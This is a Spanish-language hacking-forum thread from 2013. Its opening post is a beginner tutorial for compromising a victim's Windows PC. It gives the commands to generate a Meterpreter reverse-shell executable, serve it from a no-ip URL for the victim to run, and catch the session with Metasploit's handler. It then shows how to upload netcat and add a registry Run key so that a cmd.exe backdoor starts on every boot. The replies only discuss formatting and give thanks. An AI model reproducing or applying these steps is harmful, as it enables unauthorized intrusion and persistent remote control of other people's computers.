send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Metasploit + meterpreter + nc backdoor

  • 5 Respuestas
  • 2675 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado TrollMine

  • *
  • Underc0der
  • Mensajes: 47
  • Actividad:
    0%
  • Reputación 0
  • GEEK POWER
    • Ver Perfil
    • Twitter
  • Skype: trollmine99
« en: Septiembre 18, 2013, 05:37:13 pm »
Antes que todo aclarar que este post es para Newbie (lo explico bien por eso)

Vale, empecemos; primero abrimos la consola y generamos un .exe con msfpayload
msfpayload windows/meterpreter/reverse_tcp lhost=tu ip pública lport=el puerto X > /root/Desktop/payload.exe

vale, ahora para mayor comodidad arrancaremos apache, y subiéremos el .exe.

A continuación pondremos a escuchar meterpreter, por lo que abrimos metasploit, seleccionamos el exploit

use exploit/multi/handler,

 en este caso usaré este payload, si vosotros encontráis alguno mejor podéis usarlo

set payload windows/meterpreter/reverse_tcp ahora marcamos el puerto y el host con:

set lhost (y tu ip o no-ip)set lport ( y el puerto) vale,

ahora le damos run con exploit -j Ok,

respecto a apache, abrimos el puerto 80, por que utilizaremos el no-ip como url para enviar el "troyano", una vez que tengamos meterpreter escuchando podemos pasarle la url a la víctima, por ejemplo: You are not allowed to view links. Register or Login (ya que es el nombre que le dimos anteriormente) una vez que nos aseguramos de que la víctima ha descargado el archivo y lo ha ejecutado, nos saldrá en la consola que se ha habierto una sesión, ponemos; sessions -i 1

Ahora para asegurarnos la víctima, le subiremos netcat (nc) con; upload /pentest/windows-binaries/tools/nc.exe C:\\Windows\\System32\\nc.exe en ese "código" hemos seleccionado nuestra ruta local, y la ruta de la víctima, ahora le añadiremos al registro

netcat; reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RUN -v Backdoor -d C:\\Windows\\System32\\nc.exe" -L -d  -p (un puerto diferente a el anterior ej: 4447) -e cmd.exe" vale, ahora subiremos el mismo "troyano" (para poder ejecutarlo con netcat, ya que solo tenemos acceso a la consola)con; upload /root/Desktop/payload.exe C:\\Windows\\System32\\payload.exe

Y yá esta, ahora guardaremos su ip en un txt, y cuando queramos conectarnos pondremos; nc (su ip) 4447 (que es el puerto)


Perdón si hice algo mal, no dudéis en comentarlo y si tenéis una duda igual...
« Última modificación: Septiembre 20, 2013, 01:54:09 am por ZanGetsu »
Skype: trollmine99

Desconectado CrazyKade

  • *
  • Underc0der
  • Mensajes: 182
  • Actividad:
    0%
  • Reputación 0
  • Я только знаю что ничего не знаю!
    • Ver Perfil
« Respuesta #1 en: Septiembre 18, 2013, 06:48:52 pm »
No puedo leer el post, me duelen los ojos con esa mala elección de colores sobre el texto. Para la próxima usa colores oscuros sobre fondo blanco. Saludos.-

CrazyKade

Desconectado TrollMine

  • *
  • Underc0der
  • Mensajes: 47
  • Actividad:
    0%
  • Reputación 0
  • GEEK POWER
    • Ver Perfil
    • Twitter
  • Skype: trollmine99
« Respuesta #2 en: Septiembre 18, 2013, 06:56:41 pm »
Bueno primero lo siendo, mañana si puedo lo cambiaré y deberías mirar el brillo de tu pantalla por que para mi es legible totalmente o.O
Skype: trollmine99

Desconectado edelegg

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
  • Skype: edelegg
« Respuesta #3 en: Septiembre 19, 2013, 02:09:49 pm »
Buen post, me ha servido. Te sigo TrollMine. La verdad que cada vez me gustan más tus post.

Gracias ^^

Conectado ZanGetsu

  • *
  • Underc0der
  • Mensajes: 325
  • Actividad:
    0%
  • Reputación 0
  • I ZanGetsu
    • Ver Perfil
  • Skype: thenicox
  • Twitter: black_zangetsu
« Respuesta #4 en: Septiembre 20, 2013, 01:55:51 am »
hola, el contenido de tu post esta bueno, pero
deberías preocuparte un poco por el orden en el post y la legibilidad
edite un poco tu post, le quite las letras naranjas y le di un poco de espacio,
saludos y gracias !

Desconectado TrollMine

  • *
  • Underc0der
  • Mensajes: 47
  • Actividad:
    0%
  • Reputación 0
  • GEEK POWER
    • Ver Perfil
    • Twitter
  • Skype: trollmine99
« Respuesta #5 en: Septiembre 20, 2013, 09:46:03 am »
Muchas gracias ZanGetsu :))
La verdad que estaba un poco amontonado
« Última modificación: Septiembre 20, 2013, 09:54:19 am por TrollMine »
Skype: trollmine99

 

¿Te gustó el post? COMPARTILO!



Explotando "LNK" con MetaSploit 0-day

Iniciado por Devilboy

Respuestas: 0
Vistas: 1353
Último mensaje Julio 23, 2010, 03:14:24 pm
por Devilboy
Videos Metasploit desde básico hasta avanzado

Iniciado por dvdr

Respuestas: 24
Vistas: 18342
Último mensaje Abril 28, 2016, 11:40:55 am
por Satyricon
Administrador Gráfico de Cyber Ataques para Metasploit

Iniciado por staRgan

Respuestas: 2
Vistas: 1627
Último mensaje Junio 26, 2011, 11:58:52 pm
por Ch05piN
Usando PRY en el desarrollo de módulos para Metasploit.

Iniciado por morodog

Respuestas: 2
Vistas: 2317
Último mensaje Octubre 05, 2015, 10:42:08 pm
por Stuxnet
[Metasploit] Hackeando XAMPP Remotamente (Windows XP - 7 - 8)

Iniciado por CalebBucker

Respuestas: 4
Vistas: 3773
Último mensaje Diciembre 23, 2012, 10:08:37 pm
por CalebBucker